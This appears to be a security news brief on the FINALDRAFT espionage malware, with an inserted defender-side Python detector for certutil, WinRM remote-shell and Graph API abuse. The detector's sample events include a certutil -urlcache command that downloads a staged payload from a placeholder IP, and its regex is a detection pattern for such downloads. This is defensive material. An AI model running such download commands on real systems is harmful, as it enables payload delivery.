
Threat Cluster Wreaks Havoc With Novel FINALDRAFT Malware

Tags: cyber threat risk management, malware and virus prevention, security awareness

Threat cluster REF7707 has compromised a South American country's foreign ministry and a Southeast Asian university and telecommunications organization in intrusions involving the new FINALDRAFT malware, reports The Hacker News.

Attackers holding valid network credentials used Microsoft's certutil utility and the Windows Remote Management (WinRM) Remote Shell plugin to distribute the PATHLOADER malware, which in turn executes the C++-based FINALDRAFT remote administration tool, according to a report from Elastic Security Labs.

Besides abusing the Microsoft Graph API for command-and-control, FINALDRAFT supports file manipulation, process injection, and network proxying, deploys the PowerPick utility, and evades Windows Event Tracing (ETW).
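The two paragraphs above describe three observable traits of the intrusion chain: certutil used to move files, commands launched through the WinRM Remote Shell plugin, and command-and-control traffic to the Microsoft Graph API. The following detector is an added example written for this page, not code from the article or from Elastic Security Labs. It runs over constructed Sysmon-style process-creation and network-connection events (field names, hostnames, paths and the Graph allowlist are all assumptions chosen for illustration) and flags each trait, then correlates hosts that trip more than one rule, which is the signal a SOC analyst would want to triage first.

```python
"""Added example: defender-side detection of the tradecraft the article
describes (certutil file transfer, WinRM Remote Shell children, unexpected
Microsoft Graph API clients) over constructed Sysmon-style events.
Not the article's or Elastic's code; event layout and names are assumptions."""
import ntpath
import re
from typing import Dict, Iterable, List, Set, Tuple

Alert = Tuple[str, str, str]  # (host, rule name, offending image path)

# certutil switches commonly associated with download/transfer and encoding,
# as opposed to its normal certificate-management use.
CERTUTIL_TRANSFER = re.compile(r"\s-(urlcache|decode|encode)\b", re.IGNORECASE)

# The Graph endpoint the malware is reported to use for C2.
GRAPH_ENDPOINT = "graph.microsoft.com"

# Processes expected to talk to Graph in this assumed environment. Tune per site;
# anything else reaching the endpoint is worth a look.
GRAPH_ALLOWLIST: Set[str] = {
    "outlook.exe", "teams.exe", "ms-teams.exe", "msedge.exe", "chrome.exe", "onedrive.exe",
}

# Constructed sample events (not real telemetry). "1" ~ Sysmon process create,
# "3" ~ Sysmon network connection. Paths and hosts are made up.
EVENTS: List[Dict[str, str]] = [
    {"id": "1", "host": "ws01",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/stage.bin C:\\Users\\Public\\stage.bin",
     "parent": r"C:\Windows\System32\winrshost.exe"},
    {"id": "1", "host": "ws01",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\corp-root.cer",  # benign admin use
     "parent": r"C:\Windows\explorer.exe"},
    {"id": "1", "host": "srv02",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami",
     "parent": r"C:\Windows\System32\winrshost.exe"},  # spawned via WinRM remote shell
    {"id": "3", "host": "ws01",
     "image": r"C:\Users\Public\updater.exe",  # unexpected Graph client
     "dest_host": "graph.microsoft.com", "dest_port": "443"},
    {"id": "3", "host": "ws03",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dest_host": "graph.microsoft.com", "dest_port": "443"},  # allowlisted
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any OS."""
    return ntpath.basename(path).lower()


def detect(events: Iterable[Dict[str, str]]) -> List[Alert]:
    """Apply the three rules to each event and return every alert raised."""
    alerts: List[Alert] = []
    for ev in events:
        if ev["id"] == "1":
            if basename(ev["image"]) == "certutil.exe" and CERTUTIL_TRANSFER.search(ev["cmdline"]):
                alerts.append((ev["host"], "certutil_file_transfer", ev["image"]))
            # winrshost.exe is the host process for commands run through the
            # WinRM Remote Shell plugin; any child of it came in over WinRM.
            if basename(ev["parent"]) == "winrshost.exe":
                alerts.append((ev["host"], "winrm_remote_shell_child", ev["image"]))
        elif ev["id"] == "3":
            if ev["dest_host"].lower() == GRAPH_ENDPOINT and basename(ev["image"]) not in GRAPH_ALLOWLIST:
                alerts.append((ev["host"], "unexpected_graph_api_client", ev["image"]))
    return alerts


def summarize(alerts: Iterable[Alert]) -> Dict[str, int]:
    """Count alerts per rule for a quick overview."""
    counts: Dict[str, int] = {}
    for _, rule, _ in alerts:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


def correlate(alerts: Iterable[Alert]) -> Set[str]:
    """Hosts on which at least two distinct rules fired: the chain, not one event."""
    rules_by_host: Dict[str, Set[str]] = {}
    for host, rule, _ in alerts:
        rules_by_host.setdefault(host, set()).add(rule)
    return {host for host, rules in rules_by_host.items() if len(rules) >= 2}


if __name__ == "__main__":
    found = detect(EVENTS)
    for host, rule, image in found:
        print(f"{host}: {rule} -> {image}")
    print("per rule:", summarize(found))
    print("hosts with chained activity:", sorted(correlate(found)))
```

On the constructed sample, the benign certutil -verify call and the Outlook connection raise nothing, while ws01 trips all three rules and is the host the correlation step surfaces; the Graph allowlist is the knob most likely to need per-environment tuning, since legitimate Microsoft 365 tooling also uses that endpoint.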

The researchers also found a Linux variant of FINALDRAFT that adds shell command execution and self-deletion capabilities.

"The completeness of the tools and the level of engineering involved suggest that the developers are well-organized. The extended time frame of the operation and evidence from our telemetry suggest it's likely an espionage-oriented campaign," the researchers said.
